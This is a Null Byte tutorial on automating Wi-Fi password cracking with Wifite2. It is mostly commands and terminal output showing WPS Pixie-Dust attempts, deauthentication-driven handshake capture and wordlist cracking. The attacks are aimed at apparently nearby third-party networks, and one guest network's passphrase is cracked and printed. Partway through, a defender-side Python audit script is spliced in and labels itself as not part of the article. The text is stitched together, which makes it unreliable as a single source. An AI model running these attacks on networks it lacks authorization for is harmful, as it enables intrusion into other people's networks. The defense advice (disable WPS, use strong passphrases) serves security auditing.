
Automating Wi-Fi Hacking with Wifite2 « Null Byte :: WonderHowTo



There are many ways to attack a Wi-Fi network. The type of encryption, the manufacturer's settings, and the number of connected clients determine how easy a target is to attack and which method is best. Wifite2 is a powerful tool that automates Wi-Fi hacking, letting you select targets within range and leaving the script to choose the best strategy for each network.

Wifite2 vs. Wifite

Wifite was one of the first Wi-Fi hacking tools I was introduced to. Along with Besside-ng, automated Wi-Fi hacking scripts allowed even script kiddies to have a significant effect without knowing much about how the script worked. Compared to Besside-ng, the original Wifite used every available tool to attack a network very thoroughly, but it could also be very slow.

One of the best features of the original Wifite was that it performed a Wi-Fi site survey before attacking nearby networks, allowing a hacker to target one, some, or all of the networks in range. By presenting the available targets in an easy-to-understand format, even a novice could see which attacks were likely to work best against nearby networks.

The original Wifite would automatically attack WPA networks by attempting to capture a handshake, or use the Reaver tool to brute-force the WPS setup PIN of nearby networks. While this method was effective, it could take eight hours or more.

The updated version, Wifite2, is much faster, breaks off unproductive attacks sooner, and uses more refined tactics than its predecessor. Because of this, Wifite2 is a more serious and powerful Wi-Fi hacking tool than the original Wifite.

Attack Flow for Wi-Fi Hacking

Wifite2 follows a simple but effective workflow to hack nearby networks as quickly as possible. To do so, it pushes every tactic it tries to its practical limit, even attempting to crack the handshakes it captures.

In the first step, Wifite2 scans all channels and looks for networks within range. It ranks these networks by signal strength, because detecting a network does not guarantee that you can reliably communicate with it.

The site survey phase lists networks from strongest to weakest signal. It gathers information about which networks are present and which hacking techniques they are vulnerable to. Because of the way Wifite2 is organized, it's easy to attach a directional Wi-Fi antenna and use Wifite2 to locate the source of a nearby Wi-Fi network while the site survey is running.

Once the site survey is complete, every listed target shows whether clients are connected, whether the network is advertising WPS, and what type of encryption it uses. Based on this, an attacker can select any target, group of targets, or all targets and launch an attack informed by the collected information.

Wifite2 works through the target list, starting with the quickest and simplest attacks, such as WPS Pixie-Dust. This can recover a password in seconds, before falling back to less certain tactics such as checking for weak passwords with a dictionary attack. If an attack fails or takes too long, Wifite2 moves on to the next applicable attack, without wasting hours as its predecessor was prone to.

What you need

To get started, you need a Wi-Fi network adapter that can be put into wireless monitor mode. This means you need to choose one that is compatible with Kali Linux, for which we have several excellent guides available.

Wifite2 is installed on Kali Linux by default. I recommend that you either run Kali in a virtual machine or dual-boot it on a laptop. You can use Wifite2 on other Linux systems, but I won't go through the installation there, because this guide assumes you are using Kali Linux.

Recommended Adapter: Alfa AWUS036NHA

Step 1: Install Wifite2

If you have not already installed Wifite2 on your system, you can do so from the GitHub repository. First, clone the repository by opening a terminal window and entering the following commands:

  git clone https://github.com/derv82/wifite2.git
  cd wifite2
  sudo python setup.py install

This should download Wifite2 and install it on your system. To check that it worked, you can enter wifite -h to view information about the installed version.

  wifite -h

     .               .
   .´  ·  .     .  ·  `.  wifite 2.1.6
   :  :  :  (¯)  :  :  :  automated wireless auditor
   `.  ·  ` /¯\ ´  ·  .´  https://github.com/derv82/wifite2
     `     /¯¯¯\     ´

  optional arguments:
    -h, --help            show this help message and exit

  SETTINGS:
    -v, --verbose         Shows more options (-h -v). Prints commands and outputs. (default: quiet)
    -i [interface]        Wireless interface to use (default: choose first or ask)
    -c [channel]          Wireless channel to scan (default: all channels)
    -mac, --random-mac    Randomize wireless card MAC address (default: off)
    -p [scantime]         Pillage: Attack all targets after scantime seconds
    --kill                Kill processes that conflict with Airmon/Airodump (default: off)
    --clients-only, -co   Only show targets that have associated clients (default: off)
    --nodeauths           Passive mode: Never deauthenticates clients (default: deauth targets)

  WEP:
    --wep                 Filter to display only WEP-encrypted networks (default: off)
    --require-fakeauth    Fails attacks if fake-auth fails (default: off)
    --keep-ivs            Retain .IVS files and reuse when cracking (default: off)

  WPA:
    --wpa                 Filter to display only WPA-encrypted networks (includes WPS)
    --new-hs              Captures new handshakes, ignores existing handshakes in ./hs (default: off)
    --dict [file]         File containing passwords for cracking (default: /usr/share/wordlists/fern-wifi/common.txt)

  WPS:
    --wps                 Filter to display only WPS-enabled networks
    --bully               Use bully instead of reaver for WPS attacks (default: reaver)
    --no-wps              NEVER use WPS (Pixie-Dust) attacks on non-WEP networks (default: off)
    --wps-only            ALWAYS use WPS (Pixie-Dust) attacks on non-WEP networks (default: off)

  EVIL TWIN:
    -ev, --eviltwin       Use the Evil Twin attack against all targets (default: off)

  COMMANDS:
    --cracked             Print previously-cracked access points
    --check [file]        Check a .cap file (or all hs/*.cap files) for WPA handshakes
    --crack               Show commands to crack a captured handshake

Step 2: Insert your Wi-Fi card

Once Wifite2 is installed on your system, you need to connect your Kali Linux-compatible Wi-Fi network adapter. Wifite2 not only selects a wireless network adapter automatically, it also puts the card into monitor mode, so you don't have to do anything after connecting the adapter.

Step 3: Set Flags & Find a Target

If we know which channel we are attacking on, we can select it by adding the -c flag followed by the channel number. Otherwise, it is as simple as running Wifite2 as wifite and letting the script collect information.

  wifite -c 11

     .               .
   .´  ·  .     .  ·  `.  wifite 2.1.6
   :  :  :  (¯)  :  :  :  automated wireless auditor
   `.  ·  ` /¯\ ´  ·  .´  https://github.com/derv82/wifite2
     `     /¯¯¯\     ´

  [+] Option: Scanning for targets on channel 11
  [!] Conflicting process: NetworkManager (PID 464)
  [!] Conflicting process: wpa_supplicant (PID 729)
  [!] Conflicting process: dhclient (PID 13595)
  [!] If you have problems: kill -9 PID or re-run wifite with --kill

  [+] Looking for wireless interfaces

     Interface  PHY   Driver     Chipset
     ---------  ----  ---------  ------------------------------------------
  1. wlan0      phy3  ath9k_htc  Atheros Communications, Inc. AR9271 802.11n

  [+] Enabling monitor mode on wlan0... enabled wlan0mon

     NUM                      ESSID  CH  ENCR  POWER  WPS?  CLIENT
     ---  -------------------------  --  ----  -----  ----  ------
       1                    suicide  11   WPA   48db    no
       2        Bourgeois Pig Guest  11   WPA   45db    no
       3                      BPnet  11   WPA   42db    no
       4       DirtyLittleBirdyFeet  11   WPA   32db    no       5
       5                 ATT73qDwuI  11   WPA   32db   yes
       6                SpanishWiFi  11   WPA   24db    no
       7             Franklin Lower  11   WPA   20db    no       3
       8                      Sonos  11   WPA   11db    no
       9             Villa Carlotta  11   WPA   11db    no
      10                      Sonos  11   WPA   10db    no
  [+] Select target(s) (1-10) separated by commas, dashes or all:

Here we performed a scan on channel 11 and found 10 different targets. Of these, two have connected clients, one has WPS enabled, and all use WPA security.

Step 4: Review the Site Survey and Select Targets

From our survey we can see that target number 5 presents the best target. Although its signal strength is not the best and it has no clients, we can probably get a handshake with the new PMKID attack even when no one is connected.

When it comes to weak passwords, the first three networks have the strongest signal, while targets 4 and 7 have the best chance of yielding a quick four-way handshake to brute-force later. If we want to focus on a particular network, we can choose it now. If we want to select the most promising networks, we can choose targets 4, 5, and 7, so that a handshake can be captured quickly and cracked if the WPS PIN is not cracked first.

If we want to focus on easy targets, we can tell the script to show only targets vulnerable to a particular type of attack. To show only targets with WPS enabled, which are susceptible to Reaver or Bully attacks, we can run Wifite2 with the --wps flag.

  wifite --wps

     .               .
   .´  ·  .     .  ·  `.  wifite 2.1.6
   :  :  :  (¯)  :  :  :  automated wireless auditor
   `.  ·  ` /¯\ ´  ·  .´  https://github.com/derv82/wifite2
     `     /¯¯¯\     ´

  [+] Option: Targeting WPS-enabled networks
  [!] Conflicting process: NetworkManager (PID 464)
  [!] Conflicting process: wpa_supplicant (PID 729)
  [!] Conflicting process: dhclient (PID 14824)
  [!] If you have problems: kill -9 PID or re-run wifite with --kill

  [+] Looking for wireless interfaces

     Interface  PHY   Driver     Chipset
     ---------  ----  ---------  ------------------------------------------
  1. wlan0      phy4  ath9k_htc  Atheros Communications, Inc. AR9271 802.11n

  [+] Enabling monitor mode on wlan0... enabled wlan0mon

     NUM                      ESSID  CH  ENCR  POWER  WPS?  CLIENT
     ---  -------------------------  --  ----  -----  ----  ------
       1                  SBG6580E8   1   WPA   45db   yes
       2           The Daily Planet   1   WPA   30db   yes       1
       3                 ATT73qDwuI  11   WPA   28db   yes
       4             Birds Wireless   2   WPA   23db   yes
  [+] Select target(s) (1-4) separated by commas, dashes or all:

We can do the same with --wpa or --wep to show only targets using those types of encryption.

Step 5: Automating Attacks by Target Type

Let's pick a target from our list of results that has both WPS enabled and connected clients. After we select the number of the network we want to attack, Wifite2 runs the most appropriate attacks against it.

  [+] (1/1) Starting attacks against 69:96:43:69:D6:96 (The Daily Planet)
  [+] The Daily Planet (76db) WPS Pixie-Dust: [--78s] Failed: Timeout after 300 seconds
  [+] The Daily Planet (52db) WPA Handshake capture: Discovered new client: C8:E0:EB:45:CD:45
  [+] The Daily Planet (35db) WPA Handshake capture: Listening. (clients: 1, deauth: 11s, timeout: 7m59s)

  [+] successfully captured handshake
  [+] saving copy of handshake to hs/handshake_TheDailyPlanet_69-96-43-69-D6-96_2018-12-24T00-33-18.cap

  [+] analysis of captured handshake file:
  [+]   tshark: .cap file contains a valid handshake for 69:96:43:69:D6:96
  [!]    pyrit: .cap file does not contain a valid handshake
  [+] cowpatty: .cap file contains a valid handshake for (The Daily Planet)
  [+] aircrack: .cap file contains a valid handshake for 69:96:43:69:D6:96

  [+] Cracking WPA Handshake: Running aircrack-ng with common.txt wordlist

  [!] Failed to crack handshake: common.txt did not contain password
  [+] Finished attacking 1 target(s), exiting

Here we can see that the WPS Pixie-Dust attack failed, but we could easily capture and attack a handshake. The Pixie-Dust attack hit a fairly short time limit, so we wasted a minimum of time exploring that avenue. Sometimes different wireless cards work better with different scripts; this is the case with Reaver and Bully. If one does not work for you, try the other.

Wifite2 uses Reaver by default, but you can switch to Bully with the --bully flag.

  wifite --wps --bully

     .               .
   .´  ·  .     .  ·  `.  wifite 2.1.6
   :  :  :  (¯)  :  :  :  automated wireless auditor
   `.  ·  ` /¯\ ´  ·  .´  https://github.com/derv82/wifite2
     `     /¯¯¯\     ´

  [+] Option: Using bully instead of reaver for WPS attacks
  [+] Option: Targeting WPS-enabled networks
  [!] Conflicting process: NetworkManager (PID 464)
  [!] Conflicting process: wpa_supplicant (PID 729)
  [!] Conflicting process: dhclient (PID 14824)
  [!] If you have problems: kill -9 PID or re-run wifite with --kill

  [+] Looking for wireless interfaces
  [+] Using wlan0mon interface (already in monitor mode)
  [+] You can specify the wireless interface with -i wlan0

     NUM                      ESSID  CH  ENCR  POWER  WPS?  CLIENT
     ---  -------------------------  --  ----  -----  ----  ------
       1                  SBG6580E8   1   WPA   46db   yes
       2           The Daily Planet   1   WPA   34db   yes       1
  [+] Select target(s) (1-2) separated by commas, dashes or all: 2

  [+] (1/1) Starting attacks against 78:96:84:00:B5:B0 (The Daily Planet)
  [+] The Daily Planet (44db) WPS Pixie-Dust: [4m0s] Failed: More than 100 timeouts
  [+] The Daily Planet (34db) WPA Handshake capture: Found existing handshake for The Daily Planet
  [+] Using handshake from hs/handshake_TheDailyPlanet_78-96-84-00-B5-B0_2018-12-24T00-33-18.cap

  [+] analysis of captured handshake file:
  [+]   tshark: .cap file contains a valid handshake for 78:96:84:00:b5:b0
  [!]    pyrit: .cap file does not contain a valid handshake
  [+] cowpatty: .cap file contains a valid handshake for (The Daily Planet)
  [+] aircrack: .cap file contains a valid handshake for 78:96:84:00:B5:B0

  [+] Cracking WPA Handshake: Running aircrack-ng with common.txt wordlist

  [!] Failed to crack handshake: common.txt did not contain password
  [+] Finished attacking 1 target(s), exiting

Although we did not get a better result with Bully, trying both is a good way to find out which one works best with your wireless network adapter.

Step 6: Skip Attacks and Check Results

If Wifite2 takes too long on a given attack, you can always skip the current attack by pressing Ctrl-C, which brings up a menu asking whether you want to continue. Here you can jump to the next attack by pressing c, or enter s to stop Wifite2.

  [+] SBG6580E8 (47db) WPS Pixie-Dust: [4m52s] PIN 12523146 (Timeout) (Timeouts: 15)
  [!] Interrupted

  [+] 1 attack(s) remain, do you want to continue?
  [+] Type c to continue, or s to stop:

If we can only get a four-way handshake, we may want to supply a custom dictionary of password guesses to crack it. We can do this with the --dict flag, which sets the password file used for cracking. The default is /usr/share/wordlists/fern-wifi/common.txt. This list contains many common passwords, but you should use your own if you want serious results.

Below, we successfully crack a captured handshake using a custom dictionary, passwords.txt.

  wifite --wpa --dict ./passwords.txt

     .               .
   .´  ·  .     .  ·  `.  wifite 2.1.6
   :  :  :  (¯)  :  :  :  automated wireless auditor
   `.  ·  ` /¯\ ´  ·  .´  https://github.com/derv82/wifite2
     `     /¯¯¯\     ´

  [+] Option: Using wordlist ./passwords.txt to crack WPA handshakes
  [+] Option: Targeting WPA-encrypted networks
  [!] Conflicting process: NetworkManager (PID 419)
  [!] Conflicting process: wpa_supplicant (PID 585)
  [!] Conflicting process: dhclient (PID 7902)
  [!] If you have problems: kill -9 PID or re-run wifite with --kill

  [+] Looking for wireless interfaces
  [+] Using wlan0mon interface (already in monitor mode)
  [+] You can specify the wireless interface with -i wlan0

     NUM                      ESSID  CH  ENCR  POWER  WPS?  CLIENT
     ---  -------------------------  --  ----  -----  ----  ------
       1                    suicide  11   WPA   58db   n/a
       2        Bourgeois Pig Guest  11   WPA   56db   n/a
       3                      BPnet  11   WPA   56db   n/a
       4               Daily Planet   1   WPA   49db   n/a       1
       5                  SBG6580E8   1   WPA   49db   n/a
       6             Hyla Hair 2.4G   8   WPA   48db   n/a
       7          TWCWiFi-Passpoint   1   WPA   46db   n/a
       8  HP-Print-B9-Officejet ...   1   WPA   40db   n/a
       9             birds wireless   2   WPA   39db   n/a
      10                SpanishWiFi  11   WPA   38db   n/a
  [!] Airodump exited unexpectedly (Code: 0) Command: airodump-ng wlan0mon -a -w /tmp/wifitei_l5H1/airodump --write-interval 1 --output-format pcap,csv
  [+] Select target(s) (1-10) separated by commas, dashes or all: 2

  [+] (1/1) Starting attacks against DE:F2:86:EC:CA:A0 (Bourgeois Pig Guest)
  [+] Bourgeois Pig Guest (57db) WPA Handshake capture: Discovered new client: F0:D5:BF:BD:D5:2B
  [+] Bourgeois Pig Guest (58db) WPA Handshake capture: Discovered new client: 6C:8D:C1:A8:E4:E9
  [+] Bourgeois Pig Guest (59db) WPA Handshake capture: Listening. (clients: 2, deauth: 14s, timeout: 8m1s)

  [+] successfully captured handshake
  [+] saving copy of handshake to hs/handshake_BourgeoisPigGuest_DE-F2-86-EC-CA-A0_2018-12-24T01-40-28.cap

  [+] analysis of captured handshake file:
  [+]   tshark: .cap file contains a valid handshake for de:f2:86:ec:ca:a0
  [!]    pyrit: .cap file does not contain a valid handshake
  [+] cowpatty: .cap file contains a valid handshake for (Bourgeois Pig Guest)
  [+] aircrack: .cap file contains a valid handshake for DE:F2:86:EC:CA:A0

  [+] Cracking WPA Handshake: Running aircrack-ng with passwords.txt wordlist
  [+] Cracking WPA Handshake: 100.00% ETA: 0s @ 2234.0kps (current key: Christmasham)
  [+] Cracked WPA Handshake PSK: christmasham

  [+] Access Point Name: Bourgeois Pig Guest
  [+] Access Point BSSID: DE:F2:86:EC:CA:A0
  [+]        Encryption: WPA
  [+]    Handshake File: hs/handshake_BourgeoisPigGuest_DE-F2-86-EC-CA-A0_2018-12-24T01-40-28.cap
  [+]    PSK (password): Christmasham
  [+] saved crack result to cracked.txt (1 total)
  [+] Finished attacking 1 target(s), exiting

By adding a good password file, we improve our chances of cracking a Wi-Fi network password even when the faster WPS attacks fail.

Defense Measures

Wifite2 is an example of how even script kiddies can succeed against networks with common security weaknesses such as WPS setup PINs and weak passwords. With advanced attacks becoming ever more automated, it is important that you familiarize yourself with the most common and effective methods of attacking a Wi-Fi network.

In general, the best way to protect your network from tools like Wifite2 is to make sure WPS is disabled and to choose a very strong password for your Wi-Fi network that you do not share with third parties who don't need it.
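As an added defender-side example (not code from the article or from Wifite2), the Python below parses a Wifite2-style target table like the ones shown above and reports, for the networks you are responsible for, any that still advertise WPS or are not on WPA, plus a check of a candidate passphrase against a wordlist such as the default common.txt. The survey rows embedded here are constructed from the channel-11 scan in the article; the ESSIDs treated as "owned" are an assumption for the demonstration.

```python
"""Defender-side audit of a Wifite2-style site survey (added example, not Wifite2 code)."""
import re
from dataclasses import dataclass

# One survey row as Wifite2 prints it: NUM  ESSID  CH  ENCR  POWER  WPS?  CLIENT
ROW_RE = re.compile(
    r"^\s*(?P<num>\d+)\s+(?P<essid>.+?)\s+(?P<ch>\d+)\s+(?P<encr>WEP|WPA|OPN)"
    r"\s+(?P<power>\d+)\s*db\s+(?P<wps>yes|no)\s*(?P<clients>\d*)\s*$",
    re.IGNORECASE,
)

# Constructed sample modelled on the channel-11 scan shown in the article.
SAMPLE_SURVEY = """\
   NUM                      ESSID  CH  ENCR  POWER  WPS?  CLIENT
   ---  -------------------------  --  ----  -----  ----  ------
     1                    suicide  11   WPA   48db    no
     2        Bourgeois Pig Guest  11   WPA   45db    no
     5                 ATT73qDwuI  11   WPA   32db   yes
     7             Franklin Lower  11   WPA   20db    no       3
"""

@dataclass
class Target:
    essid: str
    channel: int
    encryption: str
    power_db: int
    wps: bool
    clients: int

def parse_survey(text):
    """Turn the target table into Target records; header and separator lines are skipped."""
    targets = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m is None:
            continue
        targets.append(Target(m["essid"].strip(), int(m["ch"]), m["encr"].upper(),
                              int(m["power"]), m["wps"].lower() == "yes",
                              int(m["clients"] or 0)))
    return targets

def audit_owned(targets, owned_essids):
    """Findings for the networks we are responsible for; other APs in range are ignored."""
    findings = []
    for t in targets:
        if t.essid not in owned_essids:
            continue
        if t.wps:  # the condition Wifite2's --wps filter and Pixie-Dust step key on
            findings.append(f"{t.essid} (ch {t.channel}): WPS advertised, disable it on the AP")
        if t.encryption != "WPA":
            findings.append(f"{t.essid} (ch {t.channel}): {t.encryption} is not WPA2/WPA3")
    return findings

def passphrase_in_wordlist(passphrase, wordlist):
    """True if the PSK would fall to the dictionary step (aircrack-ng compares exact strings)."""
    return passphrase in {w.rstrip("\n") for w in wordlist}
```

Feed it the saved output of your own survey and the wordlists you expect an attacker to try; a hit in the wordlist or a WPS finding is something to fix before anyone runs a tool like this against you.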

Be careful when selecting "all" in a target list: Wifite2 will attack every discovered network, not just the ones you have permission to attack. You must have permission to use this tool on any network you attack, since attacking a network owned by someone else without authorization is a crime and can get you into serious trouble. Blaming the script is no excuse if you get caught attacking an important network, so make sure Wifite2 is pointed only at networks you have permission to test.

I hope you enjoyed this guide to automating Wi-Fi hacking with Wifite2! If you have questions about this tutorial on Wi-Fi hacking tools or have a comment, feel free to post it in the comments or reach me on Twitter @KodyKinzie.

Don't Miss: Use MDK3 for Advanced Wi-Fi Jamming

Cover image by Kody/Null Byte



